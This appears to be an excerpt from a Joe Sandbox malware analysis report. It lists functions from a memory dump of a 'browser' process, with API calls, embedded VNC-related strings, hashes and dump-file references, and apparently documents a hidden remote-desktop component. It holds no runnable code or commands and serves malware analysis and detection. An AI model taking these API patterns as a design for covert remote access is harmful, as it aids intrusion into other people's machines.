Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
API String ID: 3609861302-2295524587
Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
Instruction ID: 027a99afed50efb98e013f3181f1347dcd15812cae2197cd8b8c4c191f8c3b14
Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
Instruction Fuzzy Hash: B5A17221A3968245EEB9FB3594512F9E2A1EF56784FC80435EB0D477E6EE2CF941C320

Function 00007FF790CF844C Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 206COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CF849D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF84A8
_wsopen_s.LIBCMT ref: 00007FF790CF86B9

Strings

, xrefs: 00007FF790CF85E4
r, xrefs: 00007FF790CF8493
UNICODE, xrefs: 00007FF790CF866B
, xrefs: 00007FF790CF8695
, xrefs: 00007FF790CF860F
UTF-16LE, xrefs: 00007FF790CF8648
, xrefs: 00007FF790CF8620
w, xrefs: 00007FF790CF8498
ccs, xrefs: 00007FF790CF85E9
UTF-8, xrefs: 00007FF790CF8625
, xrefs: 00007FF790CF8489
a, xrefs: 00007FF790CF848E
=, xrefs: 00007FF790CF8614

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo_wsopen_s
String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
API String ID: 2053332431-1561892669
Opcode ID: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
Instruction ID: d3bc0f2d62fdbee70ca6b9b4ac12a67b7bd165b0e936d4aa66dcbff4cf996c7c
Opcode Fuzzy Hash: 35e5734d2bed330ea71c417f92d73fedc9b5434ee0112678046c42af1f03098b
Instruction Fuzzy Hash: 8071AEA3E2C2034AFB756A35AA3A3B99AD06F53754FD84031DB0D267C5DE2CF5484622

Function 00007FF790C444B0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 195windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 00007FF790C444FF
SetDlgItemTextA.USER32 ref: 00007FF790C4459D
SendDlgItemMessageA.USER32 ref: 00007FF790C445E1
SendDlgItemMessageA.USER32 ref: 00007FF790C44608
_snprintf.LIBCMT ref: 00007FF790C4464F
SendDlgItemMessageA.USER32 ref: 00007FF790C4466F
SendDlgItemMessageA.USER32 ref: 00007FF790C4468B
SendDlgItemMessageA.USER32 ref: 00007FF790C446BB
SendDlgItemMessageA.USER32 ref: 00007FF790C446E0
_snprintf.LIBCMT ref: 00007FF790C44731
SendDlgItemMessageA.USER32 ref: 00007FF790C44751
GetDlgItem.USER32 ref: 00007FF790C4477F
GetScrollInfo.USER32 ref: 00007FF790C44791
SendDlgItemMessageA.USER32 ref: 00007FF790C447CA

Strings

MS Sans Serif, xrefs: 00007FF790C4461D, 00007FF790C446F8
<%s>: , xrefs: 00007FF790C44640

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Item$MessageSend$_snprintf$InfoScrollText
String ID: <%s>: $MS Sans Serif
API String ID: 1140286628-959951747
Opcode ID: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
Instruction ID: 02b58d3be508284a0d72f3ebbb6605869c4f22bcc19c654e65f392afa403b212
Opcode Fuzzy Hash: c7a658c0cd68b9c919c6da95f173c1f64cd529a423dcd2b2ccdca4d864df1cc5
Instruction Fuzzy Hash: E9918EA2B24A4196E724EF75E8006A9B3B1FF98B98F905135DE4D17B68CF3CE585C310

Function 00007FF790CF23D8 Relevance: 27.2, APIs: 18, Instructions: 236COMMON

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00007FF790CF241C
_errno.LIBCMT ref: 00007FF790CF2423
__doserrno.LIBCMT ref: 00007FF790CF2446
_errno.LIBCMT ref: 00007FF790CF244D
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CF2755

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
Instruction ID: d7ecd070a23ad63def5e7292e3e16f469d55825e851d54394986e05c4f10640e
Opcode Fuzzy Hash: 2cd480b998b965cc6955ada75f3ee5f47b1b2dcf7e54efe20603cb8eba4e3483
Instruction Fuzzy Hash: EFB13B329286528AE724AF35E4621AAF7A0FF85750F904136E78D42B94DF7CF451CB21

Function 00007FF790C9A5B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 117threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF790C9A5E1
GetThreadDesktop.USER32 ref: 00007FF790C9A5E9
OpenInputDesktop.USER32 ref: 00007FF790C9A5FC
GetLastError.KERNEL32 ref: 00007FF790C9A61A
GetUserObjectInformationA.USER32 ref: 00007FF790C9A68D
CloseDesktop.USER32 ref: 00007FF790C9A69A

Strings

vncservice.cpp : !GetUserObjectInformation(inputdesktop, xrefs: 00007FF790C9A724
vncservice.cpp : !GetUserObjectInformation(threaddesktop, xrefs: 00007FF790C9A6B9
vncservice.cpp : OpenInputDesktop II, xrefs: 00007FF790C9A652
vncservice.cpp : failed to close input desktop, xrefs: 00007FF790C9A6A4, 00007FF790C9A70F, 00007FF790C9A737
vncservice.cpp : threadname, inputname differ, xrefs: 00007FF790C9A777
vncservice.cpp : OpenInputDesktop %i I, xrefs: 00007FF790C9A620

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
API String ID: 55935355-432259686
Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction ID: f27e8a7dfe464a064c0bafab9f08b11f7d1f24af61d729c0d3231f68d3ccac36
Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
Instruction Fuzzy Hash: 58516C69A38A8381EB34FB75A8851F5A3B4FF95744FC05032D95E827A4EE3CF145C6A0

Function 00007FF790C63260 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 89threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF790C63282
GetThreadDesktop.USER32 ref: 00007FF790C6328A
GetUserObjectInformationA.USER32 ref: 00007FF790C632CF
ResetEvent.KERNEL32 ref: 00007FF790C63333
CreateThread.KERNEL32 ref: 00007FF790C63359
WaitForSingleObject.KERNEL32 ref: 00007FF790C63372
TerminateThread.KERNEL32 ref: 00007FF790C633A3
CloseHandle.KERNEL32 ref: 00007FF790C633B0

Strings

vncdesktopsink.cpp : StartInitWindowthread started, xrefs: 00007FF790C633CD
vncdesktopsink.cpp : StartInitWindowthread no default desk, xrefs: 00007FF790C63403
vncdesktopsink.cpp : StartInitWindowthread , xrefs: 00007FF790C63290
vncdesktopsink.cpp : ERROR: initwindowthread failed to start , xrefs: 00007FF790C63389
Default, xrefs: 00007FF790C632E5
vncdesktopsink.cpp : StartInitWindowthread reactivate, xrefs: 00007FF790C633E2
vncdesktopsink.cpp : StartInitWindowthread default desk, xrefs: 00007FF790C63312

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
API String ID: 3943905059-2958163836
Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
Instruction ID: 8c68675b7f2cdd90795b74e47a627c9d8453f8dba86320352e29b06b91cf1160
Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
Instruction Fuzzy Hash: 61413A65A28A8786E734AB30E8442FAE765FF85744FC41032D94D4A3A8DF3CF146C760

Function 00007FF790CA0160 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00007FF790CA0180
GlobalFree.KERNEL32 ref: 00007FF790CA0196
GlobalAlloc.KERNEL32 ref: 00007FF790CA023D
GlobalLock.KERNEL32 ref: 00007FF790CA0256
malloc.LIBCMT ref: 00007FF790CA0325

Strings

Unable to allocate memory in zip dll, xrefs: 00007FF790CA033B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Global$Lock$AllocFreemalloc
String ID: Unable to allocate memory in zip dll
API String ID: 105282483-1808592719
Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
Instruction ID: 901fd0fceed1e15808e68cc51ed5eec20e07af7706bccaf26dd1e2bb8123b9f4
Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
Instruction Fuzzy Hash: F6715922A2AB4286EB25EF74E4502B8A3A4FF85B84F945535CE4E47364DF3CF455C320

Function 00007FF790C5F420 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 157windowCOMMON

Download Yara Rule

APIs

PostMessageA.USER32 ref: 00007FF790C5F467
ReleaseDC.USER32 ref: 00007FF790C5F488
DeleteDC.GDI32 ref: 00007FF790C5F4AE
DeleteDC.GDI32 ref: 00007FF790C5F4C7
DeleteObject.GDI32 ref: 00007FF790C5F4F9
DeleteObject.GDI32 ref: 00007FF790C5F532
DeleteObject.GDI32 ref: 00007FF790C5F54B
CloseDesktop.USER32 ref: 00007FF790C5F599

Strings

vncdesktop.cpp : failed to DeleteDC hrootdc, xrefs: 00007FF790C5F492
vncdesktopsink.cpp : ShutdownInitWindowthread , xrefs: 00007FF790C5F433
vncdesktop.cpp : failed to DeleteDC hmemdc, xrefs: 00007FF790C5F4D1
vncdesktop.cpp : failed to close desktop, xrefs: 00007FF790C5F5A3
vncdesktop.cpp : failed to DeleteObject, xrefs: 00007FF790C5F503
vncdesktop.cpp : delete ((RGBPixelList) , xrefs: 00007FF790C5F646

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Delete$Object$CloseDesktopMessagePostRelease
String ID: vncdesktop.cpp : delete ((RGBPixelList) $vncdesktop.cpp : failed to DeleteDC hmemdc$vncdesktop.cpp : failed to DeleteDC hrootdc$vncdesktop.cpp : failed to DeleteObject$vncdesktop.cpp : failed to close desktop$vncdesktopsink.cpp : ShutdownInitWindowthread
API String ID: 4267955742-668190334
Opcode ID: ab99dedcbfa630c798d0b2818fc7934fde54834d7a57af70546adf842ea12c7e
Instruction ID: 942605cb3b6cd7f682c4eaa31aac7136fcc818bcdb25a02283a2878b1282406b
Opcode Fuzzy Hash: ab99dedcbfa630c798d0b2818fc7934fde54834d7a57af70546adf842ea12c7e
Instruction Fuzzy Hash: D871363A628A8284EB38AF71E9442FAA364FF45788F844436DA4D47758DF7CE146D320

Function 00007FF790C40E00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 153memorythreadCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF790C40E34
GetCurrentProcess.KERNEL32 ref: 00007FF790C40E4C
FindWindowA.USER32 ref: 00007FF790C40E62
GetWindowThreadProcessId.USER32 ref: 00007FF790C40E78
OpenProcess.KERNEL32 ref: 00007FF790C40E8E
OpenProcessToken.ADVAPI32 ref: 00007FF790C40EA8
GetTokenInformation.ADVAPI32 ref: 00007FF790C40EF6
GetLastError.KERNEL32 ref: 00007FF790C40F19
malloc.LIBCMT ref: 00007FF790C40F67

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

GetTokenInformation.ADVAPI32 ref: 00007FF790C40FA0
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF790C40FE7
EqualSid.ADVAPI32 ref: 00007FF790C41008
FreeSid.ADVAPI32 ref: 00007FF790C41028

Strings

Shell_TrayWnd, xrefs: 00007FF790C40E59

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
String ID: Shell_TrayWnd
API String ID: 1145045407-2988720461
Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction ID: 0c55e2866e31a4795f45322f14be577c52365e9e182470e8fe281febe8ae1324
Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
Instruction Fuzzy Hash: 4B615B32A286828AEB30AF31D4402E9B3A5FF45798F945535EA4D47B98DF3CF544C720

Function 00007FF790C48390 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 135filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 00007FF790C483CA
CreateFileA.KERNEL32 ref: 00007FF790C483F7
GetFileSize.KERNEL32 ref: 00007FF790C48462
GetFileSize.KERNEL32 ref: 00007FF790C48470
GetFileTime.KERNEL32 ref: 00007FF790C484A6
GetFileTime.KERNEL32 ref: 00007FF790C484C1
CompareFileTime.KERNEL32 ref: 00007FF790C484D7
CreateFileMappingA.KERNEL32 ref: 00007FF790C4851E
MapViewOfFile.KERNEL32 ref: 00007FF790C48544
CloseHandle.KERNEL32 ref: 00007FF790C48550
CloseHandle.KERNEL32 ref: 00007FF790C48559

Strings

c:\video0.dat, xrefs: 00007FF790C483B2
videodriver.cpp : Error video.dat , xrefs: 00007FF790C4856A
c:\video1.dat, xrefs: 00007FF790C483D9

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: File$CreateTime$CloseHandleSize$CompareMappingView
String ID: c:\video0.dat$c:\video1.dat$videodriver.cpp : Error video.dat
API String ID: 286203867-3102623397
Opcode ID: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
Instruction ID: 9bf46c108007dec11d3475d8201c3329067c3edf735ac241e36323927a0af34e
Opcode Fuzzy Hash: ce2218cedf4f6f46ef2e14e32633e79e1cfc0ccdd4c7bc6ede49bc933eaae26a
Instruction Fuzzy Hash: 4B518F22A2964245EA719B35A5146B9F3A2BF85BF4FC41335DA3D03BE4DE3CF449C620

Function 00007FF790C3D560 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 128processthreadCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF790C3D5A2
FindWindowA.USER32 ref: 00007FF790C3D675
GetWindowThreadProcessId.USER32 ref: 00007FF790C3D690
OpenProcess.KERNEL32 ref: 00007FF790C3D6AB
OpenProcessToken.ADVAPI32 ref: 00007FF790C3D6CA
CreateProcessAsUserA.ADVAPI32 ref: 00007FF790C3D70C
GetLastError.KERNEL32 ref: 00007FF790C3D712
CloseHandle.KERNEL32 ref: 00007FF790C3D71D
CloseHandle.KERNEL32 ref: 00007FF790C3D72D
CloseHandle.KERNEL32 ref: 00007FF790C3D73D
CloseHandle.KERNEL32 ref: 00007FF790C3D74D

Strings

Shell_TrayWnd, xrefs: 00007FF790C3D655
-settingshelper, xrefs: 00007FF790C3D5CF
Winsta0\Default, xrefs: 00007FF790C3D64E

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
